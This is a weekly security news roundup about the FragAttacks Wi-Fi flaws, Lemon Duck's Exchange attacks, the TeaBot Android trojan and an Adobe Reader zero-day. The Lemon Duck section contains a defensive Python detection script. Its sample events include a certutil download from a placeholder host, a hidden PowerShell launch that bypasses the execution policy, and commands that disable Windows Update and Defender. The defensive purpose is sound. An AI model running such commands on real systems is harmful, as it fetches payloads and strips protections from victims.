FragAttacks vulnerabilities / Lemon Duck / Trojan TeaBot / Adobe Reader’s 0-day

Welcome to the newest episode of the Xopero Security Center. What is the threat of the week this time? The FragAttacks vulnerabilities have been part of Wi-Fi since its release in 1997. This means that most devices produced during the last 24 years are vulnerable to the attack. How severe is this new threat? To find out, read the whole post below.

All Wi-Fi devices impacted by new FragAttacks vulnerabilities

Newly discovered Wi-Fi security vulnerabilities collectively known as FragAttacks (fragmentation and aggregation attacks) are impacting all Wi-Fi devices manufactured in the last 24 years.

Three of these bugs are design flaws in the Wi-Fi 802.11 standard itself, in the frame aggregation and frame fragmentation functionality, and they affect most devices. The other bugs are programming mistakes in individual Wi-Fi products. We are not exaggerating by saying that, for the most part, every Wi-Fi product is affected by at least one FragAttacks vulnerability and that most products are affected by several of them.

FragAttacks vulnerabilities affect all modern security protocols of Wi-Fi, including the latest WPA3 specification. Even the WEP protocol is affected. This means that several of the newly discovered design flaws have been part of Wi-Fi since its release in 1997.

How do FragAttacks strike?

An attacker abusing the design and implementation flaws has to be within Wi-Fi range of the targeted device. Following successful exploitation, the attacker can steal sensitive user data or execute malicious code, and potentially take over the device completely.

Now some good news. The design flaws are hard to abuse because doing so requires user interaction or is only possible when using uncommon network settings. However, the programming mistakes behind some of the FragAttacks vulnerabilities are trivial to exploit and would allow attackers to abuse unpatched Wi-Fi products with ease.

FragAttacks – a herald of the dark future?

Right now vendors are developing patches for their products to mitigate the FragAttacks bugs. Cisco Systems, HPE/Aruba Networks, Juniper Networks, Sierra Wireless, and Microsoft [1, 2, 3] have already published security updates and advisories. But what should you do if your device vendor hasn’t yet released security patches? You can still mitigate some of the FragAttacks risks. First, ensure that all websites and online services you visit use the HTTPS protocol. We advise installing the HTTPS Everywhere web browser extension – it makes this task much easier. Additionally, you can disable fragmentation, pairwise rekeys, and dynamic fragmentation in Wi-Fi 6 (802.11ax) devices.


Lemon Duck operators adopt MS Exchange Server vulnerabilities in new attacks

The Lemon Duck hacking group is becoming active again. In recent months, the group has mostly been using the SMBGhost and EternalBlue vulnerabilities. But as its use of Microsoft Exchange Server flaws shows, the group’s tactics have changed and it now also targets devices open to the ProxyLogon attack.

Lemon Duck operators use automated tools to scan for, detect, and exploit servers before loading payloads such as Cobalt Strike DNS beacons and web shells, leading to the execution of cryptocurrency mining software and additional malware. The malware and its associated PowerShell scripts also attempt to remove antivirus products and stop any services – including Windows Update and Windows Defender – that could hamper the infection attempt.

To maintain persistence, the CertUtil command-line program is utilized to download two new PowerShell scripts tasked with removing AV products, creating persistence routines, and downloading a variant of the XMRig cryptocurrency miner.
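A defender-side check for the tradecraft described in the two paragraphs above, added here as an example (it is not Lemon Duck code and not from the cited reporting): it runs simple rules over constructed process-creation events, flagging certutil downloads, hidden or policy-bypassing PowerShell launches, and tampering with the Windows Update and Windows Defender services, then escalates hosts where more than one stage of the chain fires. Hostnames, paths and the URL in the sample events are placeholders.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events: timestamp|host|parent|command line.
# Hostnames, file paths and the URL are placeholders, not real indicators.
SAMPLE_EVENTS = [
    "2021-05-14T10:01:02Z|WS01|cmd.exe|certutil.exe -urlcache -split -f http://example.invalid/a.ps1 C:\\Users\\Public\\a.ps1",
    "2021-05-14T10:01:05Z|WS01|cmd.exe|powershell.exe -nop -w hidden -ExecutionPolicy Bypass -File C:\\Users\\Public\\a.ps1",
    "2021-05-14T10:01:09Z|WS01|powershell.exe|net.exe stop wuauserv",
    "2021-05-14T10:01:10Z|WS01|powershell.exe|sc.exe config WinDefend start= disabled",
    "2021-05-14T10:02:00Z|WS02|cmd.exe|certutil.exe -hashfile C:\\setup.msi SHA256",
    "2021-05-14T10:03:00Z|WS03|powershell.exe|Stop-Service -Name Spooler",
]

# Service names behind "Windows Update" and "Windows Defender" (real-time protection and filter).
PROTECTED_SERVICES = ("wuauserv", "windefend", "wdnissvc")

# (rule name, regex over the command line). Benign certutil use (e.g. -hashfile) does not match.
RULES = [
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("powershell_hidden_bypass",
     re.compile(r"powershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden|-e(xecutionpolicy)?\s+bypass|-enc(odedcommand)?\b)", re.I)),
    ("defender_or_wu_tamper",
     re.compile(r"\b(net(\.exe)?\s+stop|sc(\.exe)?\s+(stop|config|delete)|stop-service|set-service)\b.*\b("
                + "|".join(PROTECTED_SERVICES) + r")\b", re.I)),
]


def detect(events):
    """Return (timestamp, host, rule) for every event whose command line matches a rule."""
    findings = []
    for line in events:
        ts, host, _parent, cmdline = line.split("|", 3)
        for name, pattern in RULES:
            if pattern.search(cmdline):
                findings.append((ts, host, name))
    return findings


def hosts_to_escalate(findings, min_rules=2):
    """Hosts where at least `min_rules` distinct rules fired: the chain, not a lone hit."""
    per_host = defaultdict(set)
    for _ts, host, rule in findings:
        per_host[host].add(rule)
    return sorted(h for h, rules in per_host.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for ts, host, rule in found:
        print(ts, host, rule)
    print("escalate:", hosts_to_escalate(found))
```

The single benign certutil hash on WS02 and the unrelated Stop-Service on WS03 produce no findings, so only WS01, where download, launch and service tampering all appear, is escalated.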

Lemon Duck has also been creating decoy top-level domains (TLDs) – rather than more generic and globally used TLDs such as “.com” or “.net” – to try and obfuscate command-and-control (C2) center infrastructure. This way, they can more effectively hide C2 communications among other web traffic present in victim environments.


New Android banking trojan TeaBot found hijacking users’ credentials and SMS messages

Researchers from the Italian fraud prevention firm Cleafy have discovered a new Android malware that has been targeting unsuspecting users across Europe since January 2021.

Dubbed TeaBot, the malware is in the early stages of development, yet it is already equipped with capabilities such as remotely taking full control of a targeted device, stealing login credentials, and sending and intercepting SMS messages for additional scams, including extracting banking data.

The rogue Android application, which masquerades as media and package delivery services like TeaTV, VLC Media Player, DHL, and UPS, acts as a dropper that not only loads a second-stage payload but also forces the victim into granting it accessibility service permissions.

The malware also lets its operators delete existing apps from the device, change audio settings such as muting the device, read its phone book, and read the phone state, meaning attackers can identify the victim’s phone number, the status of ongoing calls, current cellular network information, and so on. Furthermore, TeaBot constantly takes screenshots of the compromised device.

In addition, upon infecting the device, TeaBot steals Google Authentication 2FA codes, compromises other accounts on the device, and, last but not least, disables the Google Play Protect feature.

The collected information is then exfiltrated every 10 seconds to a remote server controlled by the attacker.

So far, Cleafy’s threat research team has identified more than 60 banks targeted by TeaBot malware in European countries such as Italy, Spain, Germany, Belgium, and the Netherlands. The malware supports 6 different languages: German, English, Italian, French, Spanish, and Dutch.

How to stay safe? Scan your phone regularly for the latest threats, install Android updates regularly, and avoid installing unnecessary apps – even from Google Play Store.


Hackers target Windows users exploiting a 0-day vulnerability in Adobe Reader

Adobe is warning customers of a critical zero-day bug actively exploited in the wild that affects its ubiquitous Adobe Acrobat PDF reader software. A patch is available now and includes a roundup of 43 fixes for 12 of its products, including Adobe Creative Cloud Desktop Application, Illustrator, InDesign, and Magento.

One of the issues, tracked as CVE-2021-28550, is a use-after-free memory corruption flaw in Adobe Reader for Windows that has been exploited in the wild. Successful exploitation could lead to arbitrary code execution.

Windows users of Adobe Reader may be the only ones currently targeted. However, the bug affects eight versions of the software, including those running on Windows and macOS systems. Versions include:

  • Windows Acrobat DC & Reader DC (versions 2021.001.20150 and earlier)
  • macOS Acrobat DC & Reader DC (versions 2021.001.20149 and earlier)
  • Windows & macOS Acrobat 2020 & Acrobat Reader 2020 (2020.001.30020 and earlier versions)
  • Windows & macOS Acrobat 2017 & Acrobat Reader 2017 (2017.011.30194 and earlier versions)

Adobe did not provide technical details about the attacks; in any case, the issue can be exploited by tricking a victim into opening a specially crafted PDF.

Users can update their product installations manually by choosing Help > Check for Updates.


Do you have a thirst for knowledge? There are ten more cybersecurity stories below.

1. Compsci boffin publishes proof-of-concept code for 54-year-old zero-day in Universal Turing Machine (The Register)
2. GitHub shifts away from passwords with security key support for SSH Git operations (ZDNet)
3. Organizations using Microsoft 365 experience more breaches, with more severe impacts (Help Net Security)
4. Apple kept mum about XcodeGhost malware attack against 128M users (HackRead)
5. Exploiting common URL redirection methods to create effective phishing attacks (Help Net Security)
6. Shining a Light on DARKSIDE Ransomware Operations (Fireeye)
7. Researchers Unearth 167 Fake iOS & Android Trading Apps (Dark Reading)
8. Avaddon Ransomware gang hacked France-based Acer Finance and AXA Asia (Security Affairs)
9. DarkSide ransomware call it quits after Bitcoin, servers are seized (Hack Read)
10. QNAP warns of eCh0raix ransomware and Roon Server zero-day attacks (Security Affairs)